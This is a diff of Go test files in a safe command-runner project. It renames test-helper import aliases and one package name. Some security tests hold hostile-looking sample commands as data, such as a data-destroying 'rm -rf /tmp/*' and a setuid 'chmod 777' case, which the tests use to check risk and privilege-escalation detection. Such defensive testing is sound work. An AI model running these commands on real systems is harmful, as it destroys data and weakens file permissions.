 	mockValidator.On("ValidateCommandAllowed", mock.Anything, mock.Anything).Return(nil)
@@ -188,7 +188,7 @@ func TestIntegration_Case1Only(t *testing.T) {
 		return true // Match any input
 	})).Return("token=abc123xyz") // This will be the actual output from the command
 
-	mockVerificationManager := new(verificationtesting.MockManager)
+	mockVerificationManager := new(verificationtestutil.MockManager)
 
 	// Create mock path resolver
 	mockPathResolver := &mockPathResolver{}
@@ -220,7 +220,7 @@ func TestIntegration_Case1Only(t *testing.T) {
 	})
 
 	// Mock verification manager
-	mockVerificationManager.On("VerifyGroupFiles", verificationtesting.MatchRuntimeGroupWithName("test-group")).Return(&verification.Result{}, nil)
+	mockVerificationManager.On("VerifyGroupFiles", verificationtestutil.MatchRuntimeGroupWithName("test-group")).Return(&verification.Result{}, nil)
 	mockVerificationManager.On("ResolvePath", "/bin/sh").Return("/bin/sh", nil)
 	mockVerificationManager.On("VerifyCommandDynLibDeps", mock.Anything).Return(nil)
 	mockVerificationManager.On("VerifyCommandShebangInterpreter", mock.Anything, mock.Anything).Return(nil)
@@ -289,7 +289,7 @@ func TestIntegration_Case2Only(t *testing.T) {
 	})
 	require.NoError(t, err)
 
-	mockVerificationManager := new(verificationtesting.MockManager)
+	mockVerificationManager := new(verificationtestutil.MockManager)
 
 	// Create mock path resolver
 	mockPathResolver := &mockPathResolver{}
@@ -321,7 +321,7 @@ func TestIntegration_Case2Only(t *testing.T) {
 	})
 
 	// Mock verification manager
-	mockVerificationManager.On("VerifyGroupFiles", verificationtesting.MatchRuntimeGroupWithName("test-group")).Return(&verification.Result{}, nil)
+	mockVerificationManager.On("VerifyGroupFiles", verificationtestutil.MatchRuntimeGroupWithName("test-group")).Return(&verification.Result{}, nil)
 	mockVerificationManager.On("ResolvePath", "/bin/sh").Return("/bin/sh", nil)
 	mockVerificationManager.On("VerifyCommandDynLibDeps", mock.Anything).Return(nil)
 	mockVerificationManager.On("VerifyCommandShebangInterpreter", mock.Anything, mock.Anything).Return(nil)
@@ -395,7 +395,7 @@ func TestIntegration_Case2Only_DebugLeakage(t *testing.T) {
 	})
 	require.NoError(t, err)
 
-	mockVerificationManager := new(verificationtesting.MockManager)
+	mockVerificationManager := new(verificationtestutil.MockManager)
 
 	// Create mock path resolver
 	mockPathResolver := &mockPathResolver{}
@@ -427,7 +427,7 @@ func TestIntegration_Case2Only_DebugLeakage(t *testing.T) {
 	})
 
 	// Mock verification manager
-	mockVerificationManager.On("VerifyGroupFiles", verificationtesting.MatchRuntimeGroupWithName("test-group")).Return(&verification.Result{}, nil)
+	mockVerificationManager.On("VerifyGroupFiles", verificationtestutil.MatchRuntimeGroupWithName("test-group")).Return(&verification.Result{}, nil)
 	mockVerificationManager.On("ResolvePath", "/bin/sh").Return("/bin/sh", nil)
 	mockVerificationManager.On("VerifyCommandDynLibDeps", mock.Anything).Return(nil)
 	mockVerificationManager.On("VerifyCommandShebangInterpreter", mock.Anything, mock.Anything).Return(nil)

--- a/internal/runner/resource/default_manager_test.go
+++ b/internal/runner/resource/default_manager_test.go
@@ -6,7 +6,7 @@ import (
 	"testing"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor"
-	executortesting "github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/mock"
 	"github.com/stretchr/testify/require"
@@ -14,7 +14,7 @@ import (
 
 // testMocks holds all the mocks needed for testing DefaultResourceManager
 type testMocks struct {
-	exec         *executortesting.MockExecutor
+	exec         *executortestutil.MockExecutor
 	fs           *MockFileSystem
 	priv         *MockPrivilegeManager
 	pathResolver *MockPathResolver
@@ -22,7 +22,7 @@ type testMocks struct {
 
 // setupTestMocks creates and initializes all mocks for DefaultResourceManager tests
 func setupTestMocks() *testMocks {
-	mockExec := executortesting.NewMockExecutor()
+	mockExec := executortestutil.NewMockExecutor()
 	mockFS := &MockFileSystem{}
 	mockPriv := &MockPrivilegeManager{}
 	mockPathResolver := &MockPathResolver{}
@@ -53,7 +53,7 @@ func TestNewDefaultResourceManager_NilRiskEvaluator(t *testing.T) {
 func TestDefaultResourceManager_ModeDelegation(t *testing.T) {
 	mocks := setupTestMocks()
 
-	cmd := executortesting.CreateRuntimeCommand("echo", []string{})
+	cmd := executortestutil.CreateRuntimeCommand("echo", []string{})
 	env := map[string]string{"FOO": "BAR"}
 	ctx := context.Background()
 
@@ -256,7 +256,7 @@ func TestDefaultResourceManager_UpdateCommandDebugInfo(t *testing.T) {
 		require.NoError(t, err)
 
 		// Execute a command to get a valid token
-		cmd := executortesting.CreateRuntimeCommand("echo", []string{})
+		cmd := executortestutil.CreateRuntimeCommand("echo", []string{})
 		env := map[string]string{}
 		ctx := context.Background()
 

--- a/internal/runner/resource/dryrun_manager_test.go
+++ b/internal/runner/resource/dryrun_manager_test.go
@@ -5,7 +5,7 @@ import (
 	"os"
 	"testing"
 
-	executortesting "github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/mock"
@@ -15,7 +15,7 @@ import (
 // Test helper functions for dry-run manager
 
 func createTestDryRunResourceManager() *DryRunResourceManager {
-	mockExec := executortesting.NewMockExecutor()
+	mockExec := executortestutil.NewMockExecutor()
 	mockPriv := &MockPrivilegeManager{}
 	mockPathResolver := &MockPathResolver{}
 
@@ -42,7 +42,7 @@ func createTestDryRunResourceManager() *DryRunResourceManager {
 
 func TestDryRunResourceManager_ExecuteCommand(t *testing.T) {
 	manager := createTestDryRunResourceManager()
-	cmd := executortesting.CreateRuntimeCommand("echo", []string{})
+	cmd := executortestutil.CreateRuntimeCommand("echo", []string{})
 	group := createTestCommandGroup()
 	env := map[string]string{"TEST": "value"}
 	ctx := context.Background()
@@ -153,7 +153,7 @@ func TestDryRunResourceManager_GetDryRunResults(t *testing.T) {
 
 func TestDryRunResourceManager_SecurityAnalysis(t *testing.T) {
 	// Create manager with standard command paths
-	mockExec := executortesting.NewMockExecutor()
+	mockExec := executortestutil.NewMockExecutor()
 	mockPriv := &MockPrivilegeManager{}
 	mockPathResolver := &MockPathResolver{}
 
@@ -275,7 +275,7 @@ func TestDryRunResourceManager_SecurityAnalysis(t *testing.T) {
 		require.NoError(t, err)
 
 		// Create a separate manager with setuid file path resolver
-		mockExec := executortesting.NewMockExecutor()
+		mockExec := executortestutil.NewMockExecutor()
 		mockPriv := &MockPrivilegeManager{}
 		mockPathResolver := &MockPathResolver{}
 
@@ -289,10 +289,10 @@ func TestDryRunResourceManager_SecurityAnalysis(t *testing.T) {
 		setuidManager, err := NewDryRunResourceManager(mockExec, mockPriv, mockPathResolver, opts)
 		require.NoError(t, err)
 
-		cmd := executortesting.CreateRuntimeCommand(
+		cmd := executortestutil.CreateRuntimeCommand(
 			"setuid-chmod",
 			[]string{"777", "/tmp/test"},
-			executortesting.WithName("setuid-chmod"),
+			executortestutil.WithName("setuid-chmod"),
 		)
 
 		ctx := context.Background()
@@ -312,7 +312,7 @@ func TestDryRunResourceManager_SecurityAnalysis(t *testing.T) {
 			ctx := context.Background()
 			group := createTestCommandGroup()
 			env := map[string]string{}
-			cmd := executortesting.CreateRuntimeCommandFromSpec(&tt.spec)
+			cmd := executortestutil.CreateRuntimeCommandFromSpec(&tt.spec)
 
 			_, result, err := manager.ExecuteCommand(ctx, cmd, group, env)
 
@@ -327,7 +327,7 @@ func TestDryRunResourceManager_SecurityAnalysis(t *testing.T) {
 }
 
 func TestDryRunResourceManager_PathResolverRequired(t *testing.T) {
-	mockExec := executortesting.NewMockExecutor()
+	mockExec := executortestutil.NewMockExecutor()
 	mockPriv := &MockPrivilegeManager{}
 	opts := &DryRunOptions{DetailLevel: DetailLevelDetailed}
 
@@ -338,7 +338,7 @@ func TestDryRunResourceManager_PathResolverRequired(t *testing.T) {
 }
 
 func TestDryRunResourceManager_PathResolutionFailure(t *testing.T) {
-	mockExec := executortesting.NewMockExecutor()
+	mockExec := executortestutil.NewMockExecutor()
 	mockPriv := &MockPrivilegeManager{}
 	mockPathResolver := &MockPathResolver{}
 
@@ -352,10 +352,10 @@ func TestDryRunResourceManager_PathResolutionFailure(t *testing.T) {
 	manager, err := NewDryRunResourceManager(mockExec, mockPriv, mockPathResolver, opts)
 	require.NoError(t, err)
 
-	cmd := executortesting.CreateRuntimeCommand(
+	cmd := executortestutil.CreateRuntimeCommand(
 		"nonexistent-cmd",
 		[]string{"arg1"},
-		executortesting.WithName("test-failure"),
+		executortestutil.WithName("test-failure"),
 	)
 	group := createTestCommandGroup()
 	env := map[string]string{}
@@ -518,7 +518,7 @@ func TestDryRunResourceManager_UpdateCommandDebugInfo(t *testing.T) {
 			name: "Update command with final environment using valid token",
 			setupFunc: func(m *DryRunResourceManager) CommandToken {
 				// Record a command analysis first
-				cmd := executortesting.CreateRuntimeCommand("echo", []string{"hello", "world"})
+				cmd := executortestutil.CreateRuntimeCommand("echo", []string{"hello", "world"})
 				group := createTestCommandGroup()
 				env := map[string]string{"TEST": "value"}
 				ctx := context.Background()
@@ -574,7 +574,7 @@ func TestDryRunResourceManager_UpdateCommandDebugInfo(t *testing.T) {
 			name: "Update with complete debug info including both fields",
 			setupFunc: func(m *DryRunResourceManager) CommandToken {
 				// Record a command
-				cmd := executortesting.CreateRuntimeCommand("echo", []string{"hello", "world"})
+				cmd := executortestutil.CreateRuntimeCommand("echo", []string{"hello", "world"})
 				group := createTestCommandGroup()
 				env := map[string]string{"TEST": "value"}
 				ctx := context.Background()
@@ -620,7 +620,7 @@ func TestDryRunResourceManager_UpdateCommandDebugInfo(t *testing.T) {
 			name: "Duplicate call should return error",
 			setupFunc: func(m *DryRunResourceManager) CommandToken {
 				// Record a command and update once
-				cmd := executortesting.CreateRuntimeCommand("echo", []string{"hello", "world"})
+				cmd := executortestutil.CreateRuntimeCommand("echo", []string{"hello", "world"})
 				group := createTestCommandGroup()
 				env := map[string]string{"TEST": "value"}
 				ctx := context.Background()

--- a/internal/runner/resource/error_scenarios_test.go
+++ b/internal/runner/resource/error_scenarios_test.go
@@ -8,7 +8,7 @@ import (
 	"testing"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor"
-	executortesting "github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/mock"
@@ -225,12 +225,12 @@ func TestErrorScenariosConsistency(t *testing.T) {
 			t.Run(fmt.Sprintf("%s_%s", mode.name, tt.name), func(t *testing.T) {
 				ctx := context.Background()
 				manager := mode.setup()
-				cmd := executortesting.CreateRuntimeCommand(
+				cmd := executortestutil.CreateRuntimeCommand(
 					tt.spec.Cmd,
 					tt.spec.Args,
-					executortesting.WithName(tt.spec.Name),
-					executortesting.WithRunAsUser(tt.spec.RunAsUser),
-					executortesting.WithRunAsGroup(tt.spec.RunAsGroup),
+					executortestutil.WithName(tt.spec.Name),
+					executortestutil.WithRunAsUser(tt.spec.RunAsUser),
+					executortestutil.WithRunAsGroup(tt.spec.RunAsGroup),
 				)
 				group := tt.groupSpec
 
@@ -308,10 +308,10 @@ func TestConcurrentExecutionConsistency(t *testing.T) {
 					}
 
 					for j := range commandsPerGoroutine {
-						cmd := executortesting.CreateRuntimeCommand(
+						cmd := executortestutil.CreateRuntimeCommand(
 							"echo",
 							[]string{"concurrent test"},
-							executortesting.WithName(fmt.Sprintf("concurrent-cmd-%d-%d", goroutineID, j)),
+							executortestutil.WithName(fmt.Sprintf("concurrent-cmd-%d-%d", goroutineID, j)),
 						)
 
 						_, result, err := manager.ExecuteCommand(ctx, cmd, group, envVars)
@@ -474,12 +474,12 @@ func TestDryRunManagerErrorHandling(t *testing.T) {
 
 			manager, err := tt.setup()
 			require.NoError(t, err, "setup failed: %v", err)
-			cmd := executortesting.CreateRuntimeCommand(
+			cmd := executortestutil.CreateRuntimeCommand(
 				tt.spec.Cmd,
 				tt.spec.Args,
-				executortesting.WithName(tt.spec.Name),
-				executortesting.WithRunAsUser(tt.spec.RunAsUser),
-				executortesting.WithRunAsGroup(tt.spec.RunAsGroup),
+				executortestutil.WithName(tt.spec.Name),
+				executortestutil.WithRunAsUser(tt.spec.RunAsUser),
+				executortestutil.WithRunAsGroup(tt.spec.RunAsGroup),
 			)
 			group := tt.groupSpec
 
@@ -631,10 +631,10 @@ func TestConcurrentExecution(t *testing.T) {
 
 			// Execute multiple commands in this goroutine
 			for range commandsPerGoroutine {
-				cmd := executortesting.CreateRuntimeCommand(
+				cmd := executortestutil.CreateRuntimeCommand(
 					"echo",
 					[]string{"concurrent test"},
-					executortesting.WithName("concurrent-cmd"),
+					executortestutil.WithName("concurrent-cmd"),
 				)
 
 				_, _, err := manager.ExecuteCommand(ctx, cmd, group, envVars)
@@ -694,10 +694,10 @@ func TestResourceManagerStateConsistency(t *testing.T) {
 	require.NoError(t, err)
 	require.NotNil(t, manager)
 
-	cmd := executortesting.CreateRuntimeCommand(
+	cmd := executortestutil.CreateRuntimeCommand(
 		"echo",
 		[]string{"state test"},
-		executortesting.WithName("state-test"),
+		executortestutil.WithName("state-test"),
 	)
 
 	group := &runnertypes.GroupSpec{
@@ -730,10 +730,10 @@ func TestResourceManagerStateConsistency(t *testing.T) {
 	// Test edge case: null bytes in environment variables
 	// This tests both normal and dry-run modes for proper handling
 	t.Run("null_bytes_in_environment", func(t *testing.T) {
-		nullCmd := executortesting.CreateRuntimeCommand(
+		nullCmd := executortestutil.CreateRuntimeCommand(
 			"echo",
 			[]string{"$NULL_VAR"},
-			executortesting.WithName("null-test"),
+			executortestutil.WithName("null-test"),
 		)
 
 		nullEnvVars := map[string]string{

--- a/internal/runner/resource/integration_test.go
+++ b/internal/runner/resource/integration_test.go
@@ -5,7 +5,7 @@ import (
 	"log/slog"
 	"testing"
 
-	executortesting "github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/mock"
@@ -89,12 +89,12 @@ func TestDryRunExecutionPath(t *testing.T) {
 			require.NotNil(t, dryRunManager) // Execute commands in dry-run mode
 			for _, cmdSpec := range tt.commandSpecs {
 				group := tt.groupSpecs[0] // Use first group for simplicity
-				cmd := executortesting.CreateRuntimeCommand(
+				cmd := executortestutil.CreateRuntimeCommand(
 					cmdSpec.Cmd,
 					cmdSpec.Args,
-					executortesting.WithName(cmdSpec.Name),
-					executortesting.WithRunAsUser(cmdSpec.RunAsUser),
-					executortesting.WithRunAsGroup(cmdSpec.RunAsGroup),
+					executortestutil.WithName(cmdSpec.Name),
+					executortestutil.WithRunAsUser(cmdSpec.RunAsUser),
+					executortestutil.WithRunAsGroup(cmdSpec.RunAsGroup),
 				)
 				_, result, err := dryRunManager.ExecuteCommand(ctx, cmd, group, tt.envVars)
 
@@ -147,10 +147,10 @@ func TestDryRunResultConsistency(t *testing.T) {
 		VerifyFiles:   true,
 	}
 
-	cmd := executortesting.CreateRuntimeCommand(
+	cmd := executortestutil.CreateRuntimeCommand(
 		"echo",
 		[]string{"consistency test"},
-		executortesting.WithName("consistency-test"),
+		executortestutil.WithName("consistency-test"),
 	)
 
 	group := &runnertypes.GroupSpec{
@@ -209,10 +209,10 @@ func TestDryRunResultConsistency(t *testing.T) {
 func TestDefaultResourceManagerModeConsistency(t *testing.T) {
 	ctx := context.Background()
 
-	cmd := executortesting.CreateRuntimeCommand(
+	cmd := executortestutil.CreateRuntimeCommand(
 		"echo",
 		[]string{"mode test"},
-		executortesting.WithName("mode-test"),
+		executortestutil.WithName("mode-test"),
 	)
 
 	group := &runnertypes.GroupSpec{

--- a/internal/runner/resource/normal_manager_test.go
+++ b/internal/runner/resource/normal_manager_test.go
@@ -7,7 +7,7 @@ import (
 	"testing"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor"
-	executortesting "github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/output"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	tu "github.com/isseis/go-safe-cmd-runner/internal/testutil"
@@ -138,14 +138,14 @@ var (
 // testResourceManagerFixture holds all mocks and the manager for testing
 type testResourceManagerFixture struct {
 	Manager       *NormalResourceManager
-	MockExec      *executortesting.MockExecutor
+	MockExec      *executortestutil.MockExecutor
 	MockFS        *MockFileSystem
 	MockPriv      *MockPrivilegeManager
 	MockOutputMgr *MockCaptureManager
 }
 
 func createTestNormalResourceManager() *testResourceManagerFixture {
-	mockExec := executortesting.NewMockExecutor()
+	mockExec := executortestutil.NewMockExecutor()
 	mockFS := &MockFileSystem{}
 	mockPriv := &MockPrivilegeManager{}
 	mockOutputMgr := &MockCaptureManager{}
@@ -174,7 +174,7 @@ func createTestCommandGroup() *runnertypes.GroupSpec {
 
 func TestNormalResourceManager_ExecuteCommand(t *testing.T) {
 	f := createTestNormalResourceManager()
-	cmd := executortesting.CreateRuntimeCommand("echo", []string{"hello", "world"})
+	cmd := executortestutil.CreateRuntimeCommand("echo", []string{"hello", "world"})
 	group := createTestCommandGroup()
 	env := map[string]string{"TEST": "value"}
 	ctx := context.Background()
@@ -228,13 +228,13 @@ func TestNormalResourceManager_ExecuteCommand_PrivilegeEscalationBlocked(t *test
 
 	for _, tc := range testCases {
 		t.Run(tc.name, func(t *testing.T) {
-			cmd := executortesting.CreateRuntimeCommand(
+			cmd := executortestutil.CreateRuntimeCommand(
 				tc.cmd,
 				tc.args,
-				executortesting.WithName("test-privilege-command"),
-				executortesting.WithWorkDir("/tmp"),
-				executortesting.WithTimeout(tu.Int32Ptr(30)),
-				executortesting.WithRiskLevel("low"),
+				executortestutil.WithName("test-privilege-command"),
+				executortestutil.WithWorkDir("/tmp"),
+				executortestutil.WithTimeout(tu.Int32Ptr(30)),
+				executortestutil.WithRiskLevel("low"),
 			)
 			group := createTestCommandGroup()
 			env := map[string]string{"TEST": "value"}
@@ -320,13 +320,13 @@ func TestNormalResourceManager_ExecuteCommand_RiskLevelControl(t *testing.T) {
 
 	for _, tc := range testCases {
 		t.Run(tc.name, func(t *testing.T) {
-			cmd := executortesting.CreateRuntimeCommand(
+			cmd := executortestutil.CreateRuntimeCommand(
 				tc.cmd,
 				tc.args,
-				executortesting.WithName("test-command"),
-				executortesting.WithWorkDir("/tmp"),
-				executortesting.WithTimeout(tu.Int32Ptr(30)),
-				executortesting.WithRiskLevel(tc.riskLevel),
+				executortestutil.WithName("test-command"),
+				executortestutil.WithWorkDir("/tmp"),
+				executortestutil.WithTimeout(tu.Int32Ptr(30)),
+				executortestutil.WithRiskLevel(tc.riskLevel),
 			)
 
 			if tc.shouldExecute {

--- a/internal/runner/resource/performance_test.go
+++ b/internal/runner/resource/performance_test.go
@@ -5,7 +5,7 @@ import (
 	"log/slog"
 	"testing"
 
-	executortesting "github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	"github.com/stretchr/testify/mock"
 	"github.com/stretchr/testify/require"
@@ -28,10 +28,10 @@ func BenchmarkDryRunPerformance(b *testing.B) {
 			// Create test commands
 			commands := make([]*runnertypes.RuntimeCommand, bm.numCommands)
 			for i := 0; i < bm.numCommands; i++ {
-				commands[i] = executortesting.CreateRuntimeCommand(
+				commands[i] = executortestutil.CreateRuntimeCommand(
 					"echo",
 					[]string{"test"},
-					executortesting.WithName("test-cmd"),
+					executortestutil.WithName("test-cmd"),
 				)
 			}
 
@@ -146,10 +146,10 @@ func BenchmarkFormatterPerformance(b *testing.B) {
 
 // BenchmarkResourceManagerModeSwitch benchmarks mode switching performance
 func BenchmarkResourceManagerModeSwitch(b *testing.B) {
-	cmd := executortesting.CreateRuntimeCommand(
+	cmd := executortestutil.CreateRuntimeCommand(
 		"echo",
 		[]string{"switch test"},
-		executortesting.WithName("switch-test"),
+		executortestutil.WithName("switch-test"),
 	)
 
 	group := &runnertypes.GroupSpec{
@@ -191,10 +191,10 @@ func BenchmarkResourceManagerModeSwitch(b *testing.B) {
 func BenchmarkMemoryUsage(b *testing.B) {
 	commands := make([]*runnertypes.RuntimeCommand, 1000)
 	for i := 0; i < 1000; i++ {
-		commands[i] = executortesting.CreateRuntimeCommand(
+		commands[i] = executortestutil.CreateRuntimeCommand(
 			"echo",
 			[]string{"memory test"},
-			executortesting.WithName("memory-test"),
+			executortestutil.WithName("memory-test"),
 		)
 	}
 

--- a/internal/runner/resource/security_test.go
+++ b/internal/runner/resource/security_test.go
@@ -4,7 +4,7 @@ import (
 	"context"
 	"testing"
 
-	executortesting "github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/security"
 	"github.com/stretchr/testify/assert"
@@ -93,10 +93,10 @@ func TestSecurityAnalysis(t *testing.T) {
 			}
 
 			// Execute the command
-			cmd := executortesting.CreateRuntimeCommand(
+			cmd := executortestutil.CreateRuntimeCommand(
 				tt.spec.Cmd,
 				tt.spec.Args,
-				executortesting.WithName(tt.spec.Name),
+				executortestutil.WithName(tt.spec.Name),
 			)
 			_, result, err := manager.ExecuteCommand(ctx, cmd, group, envVars)
 			assert.NoError(t, err)
@@ -189,12 +189,12 @@ func TestPrivilegeEscalationDetection(t *testing.T) {
 			}
 
 			// Execute the command
-			cmd := executortesting.CreateRuntimeCommand(
+			cmd := executortestutil.CreateRuntimeCommand(
 				tt.spec.Cmd,
 				tt.spec.Args,
-				executortesting.WithName(tt.spec.Name),
-				executortesting.WithRunAsUser(tt.spec.RunAsUser),
-				executortesting.WithRunAsGroup(tt.spec.RunAsGroup),
+				executortestutil.WithName(tt.spec.Name),
+				executortestutil.WithRunAsUser(tt.spec.RunAsUser),
+				executortestutil.WithRunAsGroup(tt.spec.RunAsGroup),
 			)
 			_, _, err = manager.ExecuteCommand(ctx, cmd, group, envVars)
 			assert.NoError(t, err)
@@ -256,10 +256,10 @@ func TestCommandSecurityAnalysis(t *testing.T) {
 		Description: "Security test group",
 	}
 
-	cmd := executortesting.CreateRuntimeCommand(
+	cmd := executortestutil.CreateRuntimeCommand(
 		"rm",
 		[]string{"-rf", "/tmp/*"},
-		executortesting.WithName("dangerous-rm"),
+		executortestutil.WithName("dangerous-rm"),
 	)
 
 	// Execute the command
@@ -319,10 +319,10 @@ func TestSecurityAnalysisIntegration(t *testing.T) {
 
 	var analyses []Analysis
 	for _, cmdSpec := range commandSpecs {
-		cmd := executortesting.CreateRuntimeCommand(
+		cmd := executortestutil.CreateRuntimeCommand(
 			cmdSpec.Cmd,
 			cmdSpec.Args,
-			executortesting.WithName(cmdSpec.Name),
+			executortestutil.WithName(cmdSpec.Name),
 		)
 		_, _, err := manager.ExecuteCommand(ctx, cmd, group, map[string]string{})
 		assert.NoError(t, err)

--- a/internal/runner/resource/testutil/helpers.go
+++ b/internal/runner/resource/testutil/helpers.go
@@ -1,7 +1,7 @@
 //go:build test || performance
 
-// Package testutil provides test helper functions for resource management testing.
-package testutil
+// Package resourcetestutil provides test helper functions for resource management testing.
+package resourcetestutil
 
 import (
 	"log/slog"

--- a/internal/runner/resource/usergroup_dryrun_test.go
+++ b/internal/runner/resource/usergroup_dryrun_test.go
@@ -4,8 +4,8 @@ import (
 	"context"
 	"testing"
 
-	executortesting "github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
-	privilegetesting "github.com/isseis/go-safe-cmd-runner/internal/runner/base/privilege/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/privilege/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/mock"
@@ -14,20 +14,20 @@ import (
 
 func TestDryRunResourceManager_UserGroupValidation(t *testing.T) {
 	t.Run("valid_user_group_specification", func(t *testing.T) {
-		mockExec := executortesting.NewMockExecutor()
-		mockPriv := privilegetesting.NewMockPrivilegeManager(true)
+		mockExec := executortestutil.NewMockExecutor()
+		mockPriv := privilegetestutil.NewMockPrivilegeManager(true)
 		mockPathResolver := &MockPathResolver{}
 		setupStandardCommandPaths(mockPathResolver)
 
 		manager, err := NewDryRunResourceManager(mockExec, mockPriv, mockPathResolver, &DryRunOptions{})
 		require.NoError(t, err, "Failed to create DryRunResourceManager")
 
-		cmd := executortesting.CreateRuntimeCommand(
+		cmd := executortestutil.CreateRuntimeCommand(
 			"echo",
 			[]string{"test"},
-			executortesting.WithName("test_user_group"),
-			executortesting.WithRunAsUser("testuser"),
-			executortesting.WithRunAsGroup("testgroup"),
+			executortestutil.WithName("test_user_group"),
+			executortestutil.WithRunAsUser("testuser"),
+			executortestutil.WithRunAsGroup("testgroup"),
 		)
 
 		group := &runnertypes.GroupSpec{
@@ -53,8 +53,8 @@ func TestDryRunResourceManager_UserGroupValidation(t *testing.T) {
 	})
 
 	t.Run("invalid_user_group_specification", func(t *testing.T) {
-		mockExec := executortesting.NewMockExecutor()
-		mockPriv := privilegetesting.NewFailingMockPrivilegeManager(true) // Will fail user/group validation
+		mockExec := executortestutil.NewMockExecutor()
+		mockPriv := privilegetestutil.NewFailingMockPrivilegeManager(true) // Will fail user/group validation
 
 		mockPathResolver := &MockPathResolver{}
 		setupStandardCommandPaths(mockPathResolver)
@@ -62,12 +62,12 @@ func TestDryRunResourceManager_UserGroupValidation(t *testing.T) {
 		manager, err := NewDryRunResourceManager(mockExec, mockPriv, mockPathResolver, &DryRunOptions{})
 		require.NoError(t, err, "Failed to create DryRunResourceManager")
 
-		cmd := executortesting.CreateRuntimeCommand(
+		cmd := executortestutil.CreateRuntimeCommand(
 			"echo",
 			[]string{"test"},
-			executortesting.WithName("test_invalid_user_group"),
-			executortesting.WithRunAsUser("nonexistent_user"),
-			executortesting.WithRunAsGroup("nonexistent_group"),
+			executortestutil.WithName("test_invalid_user_group"),
+			executortestutil.WithRunAsUser("nonexistent_user"),
+			executortestutil.WithRunAsGroup("nonexistent_group"),
 		)
 
 		group := &runnertypes.GroupSpec{
@@ -91,8 +91,8 @@ func TestDryRunResourceManager_UserGroupValidation(t *testing.T) {
 	})
 
 	t.Run("user_group_not_supported", func(t *testing.T) {
-		mockExec := executortesting.NewMockExecutor()
-		mockPriv := privilegetesting.NewMockPrivilegeManager(false) // Not supported
+		mockExec := executortestutil.NewMockExecutor()
+		mockPriv := privilegetestutil.NewMockPrivilegeManager(false) // Not supported
 
 		mockPathResolver := &MockPathResolver{}
 		setupStandardCommandPaths(mockPathResolver)
@@ -100,12 +100,12 @@ func TestDryRunResourceManager_UserGroupValidation(t *testing.T) {
 		manager, err := NewDryRunResourceManager(mockExec, mockPriv, mockPathResolver, &DryRunOptions{})
 		require.NoError(t, err, "Failed to create DryRunResourceManager")
 
-		cmd := executortesting.CreateRuntimeCommand(
+		cmd := executortestutil.CreateRuntimeCommand(
 			"echo",
 			[]string{"test"},
-			executortesting.WithName("test_user_group_unsupported"),
-			executortesting.WithRunAsUser("testuser"),
-			executortesting.WithRunAsGroup("testgroup"),
+			executortestutil.WithName("test_user_group_unsupported"),
+			executortestutil.WithRunAsUser("testuser"),
+			executortestutil.WithRunAsGroup("testgroup"),
 		)
 
 		group := &runnertypes.GroupSpec{
@@ -126,7 +126,7 @@ func TestDryRunResourceManager_UserGroupValidation(t *testing.T) {
 	})
 
 	t.Run("no_privilege_manager", func(t *testing.T) {
-		mockExec := executortesting.NewMockExecutor()
+		mockExec := executortestutil.NewMockExecutor()
 		// No privilege manager provided
 
 		mockPathResolver := &MockPathResolver{}
@@ -135,12 +135,12 @@ func TestDryRunResourceManager_UserGroupValidation(t *testing.T) {
 		manager, err := NewDryRunResourceManager(mockExec, nil, mockPathResolver, &DryRunOptions{})
 		require.NoError(t, err, "Failed to create DryRunResourceManager")
 
-		cmd := executortesting.CreateRuntimeCommand(
+		cmd := executortestutil.CreateRuntimeCommand(
 			"echo",
 			[]string{"test"},
-			executortesting.WithName("test_no_privmgr"),
-			executortesting.WithRunAsUser("testuser"),
-			executortesting.WithRunAsGroup("testgroup"),
+			executortestutil.WithName("test_no_privmgr"),
+			executortestutil.WithRunAsUser("testuser"),
+			executortestutil.WithRunAsGroup("testgroup"),
 		)
 
 		group := &runnertypes.GroupSpec{
@@ -161,8 +161,8 @@ func TestDryRunResourceManager_UserGroupValidation(t *testing.T) {
 	})
 
 	t.Run("only_user_specified", func(t *testing.T) {
-		mockExec := executortesting.NewMockExecutor()
-		mockPriv := privilegetesting.NewMockPrivilegeManager(true)
+		mockExec := executortestutil.NewMockExecutor()
+		mockPriv := privilegetestutil.NewMockPrivilegeManager(true)
 
 		mockPathResolver := &MockPathResolver{}
 		setupStandardCommandPaths(mockPathResolver)
